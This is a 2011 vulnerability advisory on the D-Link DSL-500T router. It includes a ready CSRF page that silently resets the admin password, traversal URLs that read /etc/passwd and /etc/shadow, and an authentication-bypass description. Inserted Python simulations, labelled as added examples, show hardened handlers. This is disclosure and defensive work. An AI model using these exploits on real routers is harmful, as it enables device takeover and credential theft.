SECURITYVULNS:DOC:27475
Dec 26, 2011

CSRF, DT and AB vulnerabilities in D-Link DSL-500T ADSL Router


Hello 3APA3A!

I want to warn you about new security vulnerabilities in the D-Link DSL-500T ADSL Router, which I found and disclosed last week.

These are Cross-Site Request Forgery, Directory Traversal and Authentication Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced and will be disclosed later, after giving D-Link time to fix those vulnerabilities) in my series of advisories about vulnerabilities in D-Link products.

CSRF (WASC-09):

All functionality of the router's admin panel is vulnerable to CSRF. For example, the following CSRF request changes the administrator's login and password.

D-Link DSL-500T CSRF.html

<html>
<head>
<title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/cgi-bin/webcm" method="post" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="getpage" value="…/html/tools/usrmgmt.htm">
<input type="hidden" name="security:settings/username" value="admin">
<input type="hidden" name="security:settings/password" value="password">
<input type="hidden" name="security:settings/password_confirm" value="password">
<input type="hidden" name="security:settings/idle_timeout" value="30">
</form>
</body>
</html>

All other functions in the admin panel are also vulnerable to CSRF. And by combining XSS with the Directory Traversal, it would be possible to read arbitrary files from the router remotely.
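The page above succeeds because the browser attaches the router's session cookie to the auto-submitted cross-site POST, and the cookie is the only thing the handler checks. The following Python simulation is an added example, not code from the advisory or from D-Link's firmware: the handler names, the session layout, the origin check and the per-session token are all assumptions. It replays the forged post (with the exact field names from the form above) against a cookie-only handler and against a hardened one, then shows that a legitimate same-origin post carrying the token still works.

```python
"""Simulated webcm handler for the usrmgmt.htm settings form: the cookie-only
check the forged request relies on, beside a hardened version.
Added example; the handler names, session layout and token scheme are
assumptions, not the DSL-500T firmware."""
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

ROUTER_ORIGIN = "http://192.168.1.1"

# Constructed: the fields the CSRF page posts (getpage/routing omitted).
FORGED_FIELDS = {
    "security:settings/username": "admin",
    "security:settings/password": "password",
    "security:settings/password_confirm": "password",
    "security:settings/idle_timeout": "30",
}


def make_router():
    """Hypothetical router state: current admin credentials and one live session."""
    return {
        "username": "admin",
        "password": "original-secret",
        "sessions": {"sid-1": {"csrf_token": secrets.token_hex(16)}},
    }


def session_from(headers):
    """The browser attaches the router's cookie to cross-site form posts too."""
    cookie = headers.get("Cookie", "")
    return cookie[4:] if cookie.startswith("sid=") else None


def apply_settings(router, form):
    """Apply the usrmgmt fields; the only check is that the passwords match."""
    pw = form.get("security:settings/password", [""])[0]
    if not pw or pw != form.get("security:settings/password_confirm", [""])[0]:
        return 400
    router["username"] = form.get("security:settings/username", ["admin"])[0]
    router["password"] = pw
    return 200


def webcm_vulnerable(router, headers, body):
    """A valid session cookie is the only gate, so a forged cross-site POST succeeds."""
    if session_from(headers) not in router["sessions"]:
        return 401
    return apply_settings(router, parse_qs(body))


def webcm_hardened(router, headers, body):
    """Same handler with two independent CSRF defences."""
    sid = session_from(headers)
    if sid not in router["sessions"]:
        return 401
    # 1. The request must come from the router's own origin; a cross-site
    #    form post carries the attacker's Origin (or Referer).
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != ROUTER_ORIGIN and not origin.startswith(ROUTER_ORIGIN + "/"):
        return 403
    # 2. The form must carry the per-session secret token, which the attacker's
    #    page cannot read across origins (constant-time compare).
    form = parse_qs(body)
    supplied = form.get("csrf_token", [""])[0].encode()
    expected = router["sessions"][sid]["csrf_token"].encode()
    if not hmac.compare_digest(supplied, expected):
        return 403
    return apply_settings(router, form)


def run_scenarios():
    """Replay the forged post against both handlers, then a legitimate post
    against the hardened one. Returns status codes and resulting passwords."""
    forged_headers = {"Cookie": "sid=sid-1", "Origin": "http://attacker.example"}
    forged_body = urlencode(FORGED_FIELDS)

    r_vuln = make_router()
    vuln_status = webcm_vulnerable(r_vuln, forged_headers, forged_body)

    r_hard = make_router()
    hard_forged_status = webcm_hardened(r_hard, forged_headers, forged_body)
    password_after_forged = r_hard["password"]

    legit_headers = {"Cookie": "sid=sid-1", "Origin": ROUTER_ORIGIN}
    legit_body = urlencode({**FORGED_FIELDS,
                            "csrf_token": r_hard["sessions"]["sid-1"]["csrf_token"]})
    hard_legit_status = webcm_hardened(r_hard, legit_headers, legit_body)

    return {
        "vulnerable": (vuln_status, r_vuln["password"]),
        "hardened_forged": (hard_forged_status, password_after_forged),
        "hardened_legit": (hard_legit_status, r_hard["password"]),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name}: status={result[0]} password={result[1]}")
```

The origin check alone is not enough on its own (older browsers omit Origin, and Referer can be suppressed), which is why the token check is kept as an independent gate; either one defeats the form above, since the attacker's page can neither set the router's origin nor read the token.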

Directory Traversal (WASC-33):

In 2006 a DT vulnerability was found in other models of D-Link routers (CVE-2006-2337). It also exists in this model, as I've checked (but unlike the description of the DT in other models, in my model authentication is required).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

It is possible to read arbitrary files from the router, but this vulnerability works only after authentication.
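The two URLs above work when the handler joins the getpage value onto its document root without anchoring it there: an absolute value like /etc/passwd replaces the root entirely, and ".." segments walk out of it. The following is an added example, not the DSL-500T firmware's code: it builds a small constructed directory tree (a fake html/ root with a sibling etc/passwd standing in for the real one), reproduces the traversal against a naive join, and shows a root-anchored lookup that rejects both forms. Function names and the fixture layout are assumptions.

```python
"""getpage handling: the traversal the advisory describes against a naive
join, beside a root-anchored lookup. Added example; the handler names and
the fixture tree are constructed for the demonstration."""
import os
import tempfile


def getpage_vulnerable(docroot, getpage):
    """Mimics a handler that joins the parameter onto the document root.
    os.path.join discards docroot when getpage is absolute, and '..' segments
    walk out of it, so /etc/passwd-style requests read files outside the root."""
    path = os.path.join(docroot, getpage)
    with open(path, "rb") as f:
        return f.read()


def getpage_safe(docroot, getpage):
    """Resolve the requested page strictly inside docroot; reject anything else."""
    root = os.path.realpath(docroot)
    # Treat the parameter as relative regardless of drive or leading slashes,
    # then resolve symlinks and '..' before checking containment.
    relative = os.path.splitdrive(getpage)[1].lstrip("/\\")
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"getpage escapes document root: {getpage!r}")
    with open(candidate, "rb") as f:
        return f.read()


def build_fixture():
    """Constructed filesystem: base/html/tools/usrmgmt.htm as the web root and
    base/etc/passwd outside it, standing in for the router's real /etc/passwd."""
    base = tempfile.mkdtemp()
    docroot = os.path.join(base, "html")
    os.makedirs(os.path.join(docroot, "tools"))
    with open(os.path.join(docroot, "tools", "usrmgmt.htm"), "w") as f:
        f.write("<html>user management</html>")
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(base, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")
    return base, docroot


def demo():
    """Run the traversal variants against both handlers and report outcomes."""
    base, docroot = build_fixture()
    abs_target = os.path.join(base, "etc", "passwd")  # plays the role of /etc/passwd
    out = {}
    # Naive join: both the '..' form and the absolute form leak the file.
    out["vuln_dotdot"] = getpage_vulnerable(docroot, "../etc/passwd").startswith(b"root:")
    out["vuln_absolute"] = getpage_vulnerable(docroot, abs_target).startswith(b"root:")
    # Anchored lookup: a legitimate page is served, escapes are not.
    out["safe_page"] = getpage_safe(docroot, "/tools/usrmgmt.htm").startswith(b"<html>")
    for name, arg in (("safe_dotdot", "../etc/passwd"), ("safe_absolute", abs_target)):
        try:
            getpage_safe(docroot, arg)
            out[name] = "served"
        except PermissionError:
            out[name] = "rejected"
        except FileNotFoundError:
            out[name] = "not found in docroot"
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The containment check is done on the realpath of both sides so that a symlink inside the web root pointing outside it is caught as well; an absolute getpage is simply reinterpreted relative to the root, which is why it ends as "not found in docroot" rather than a leak.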

Authentication Bypass (WASC-01):

In 2005 an AB vulnerability was found in other models of D-Link routers (CVE-2005-1680). It also exists in this model, as I've checked.

It is possible to send commands to the firmwarecfg application without authentication, which allows, for example, retrieving the configuration file containing the administrator's login and password, and thereby gaining access to the admin panel.

The following model is vulnerable: D-Link DSL-500T, Firmware V1.00B02T02.RU.20050223. This model with other firmware versions is also vulnerable, and other D-Link router models may also be vulnerable.

I described these vulnerabilities on my site (http://websecurity.com.ua/5581/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
